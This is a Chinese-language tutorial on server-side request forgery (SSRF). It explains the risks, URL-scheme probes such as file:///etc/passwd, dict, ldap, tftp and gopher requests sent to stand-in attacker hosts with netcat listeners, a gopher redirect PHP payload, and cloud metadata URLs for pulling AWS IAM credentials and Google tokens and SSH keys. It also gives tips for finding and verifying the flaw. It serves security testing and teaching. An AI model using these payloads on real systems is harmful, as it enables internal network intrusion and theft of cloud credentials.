SSRF

SSRF

关于SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造)，攻击者通过伪造服务器端发起的请求，获取客户端所不能得到的数据。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。

SSRF危害

1. 产生反射型 XSS
2. 通过 url scheme (file:///, dict://, ftp://, gopher:// ...) 读取内部资源或者让服务执行相应的动作
3. 扫描内部网络和端口
4. 如果运行在云实例上，可以尝试获取 META-DATA

SSRF产生反射型 XSS

简单的从外部网站获取一个恶意 payload ，并且响应类型是 html 格式，如：

http://localhost:4567/?url=http://brutelogic.com.br/poc.svg

测试 url scheme

当找到一个 SSRF 时，第一件事情就是测试对应可支持的 url scheme，如：

file://

dict://

sftp://

ldap://

tftp://

gopher://

• file://
  
  file://模式用于从文件系统中获取文件内容

http://example.com/ssrf.php?url=file:///etc/passwd

http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

• dict://
  
  dict//通过DICT协议引入定义或者可用的单词列表

当服务端禁止或者只允许白名单从外部网站请求资源，可以通过dic://模式来发送一个请求

http://example.com/ssrf.php?dict://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0

• sftp://
  
  Sftp是一个SSH文件传输协议或安全文件传输协议，和SSH打包在一起的单独协议，和SSH一样都是通过安全连接进行通信。

http://example.com/ssrf.php?url=sftp://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 37146)
SSH-2.0-libssh2_1.4.2

• ldap:// 或 ldaps:// 或 ldapi://
  
  LDAP代表轻量级的目录访问协议。它是在IP网络上使用的应用程序协议，用于管理和访问分布式目录信息服务。

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

• tftp://
  
  tftp用来在客户机与服务器之间进行简单文件传输的协议，提供不复杂、开销不大的文件传输服务。

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
TESTUDPPACKEToctettsize0blksize512timeout3

• gopher://

Gopher是一个分布式文档传输服务，允许用户以无缝的方式针对放在不同位置的文档进行浏览、查询、获取。

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

gopher.php (host it on acttacker.com):

<?php
  header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
?>

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 49398)
Hi
ssrf
test

扫描内部网络和端口

如果他们在 LAN 上运行某些服务，如 Kibana、Elastic Search、MongoDB ，因为防火墙阻止，无法直接进入内部网络。我们可以使用 SSRF 访问到内部服务。

云实例

Amazon: 如果你在 Amazon 中找到 SSRF，则 Amazon 会公开每个 EC2 实例的内部服务，可以查询主机实例的元数据。当你发现在 EC2 上存在 SSRF 漏洞，可尝试如下请求：

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

这将提供给我们有趣的信息，如 Aws keys，ssh keys 等

可参考这些 POC :

https://hackerone.com/reports/285380
https://hackerone.com/reports/53088

例如：

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/[INJECTION PAYLOAD]

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/

Google Cloud 同样适用于 google:

http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token

http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json

进一步利用可以带来实例接管

参考:

https://hackerone.com/reports/341876

其它的云实例，你可以参考:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF%20injection#ssrf-url-for-aws-bucket

漏洞挖掘

• 从WEB功能上寻找

1. 分享：通过URL地址分享内容
2. 转码：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3. 在线翻译：通过URL地址翻译对应文本的内容
4. 图片加载与下载：通过URL地址加载或下载图片
5. 图片、文章收藏功能
6. 未公开的API实现以及其他调用URL的功能

• 从URL关键字寻找

share、wap、url、link、src、source、target、u、3g、
display、sourceURl、imageURL、domain...

漏洞验证

排除法一

http://www.XXXXX.com/***/service?image=http://www.baidu.com/img/bd_logo1.png

你可以直接右键图片，在新窗口打开图片，如果是浏览器上URL地址栏是http://www.baidu.com/img/bd_logo1.png，说明不存在SSRF漏洞。

排除法二

• 查看burpsuite的http history是否存在图片的请求。
• 浏览器审查元素查看是否存在图片的请求。

单服务器

127.0.0.1

多服务器

10.0.0.0–10.255.255.255
172.16.0.0–172.31.255.255
192.168.0.0–192.168.255.255

CEYE

CEYE是一个用来检测带外（Out-of-Band）流量的监控平台，如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息。

参考：

https://www.secpulse.com/archives/4747.html

https://mp.weixin.qq.com/s/bjjChubAvo8iOUYYU78uaw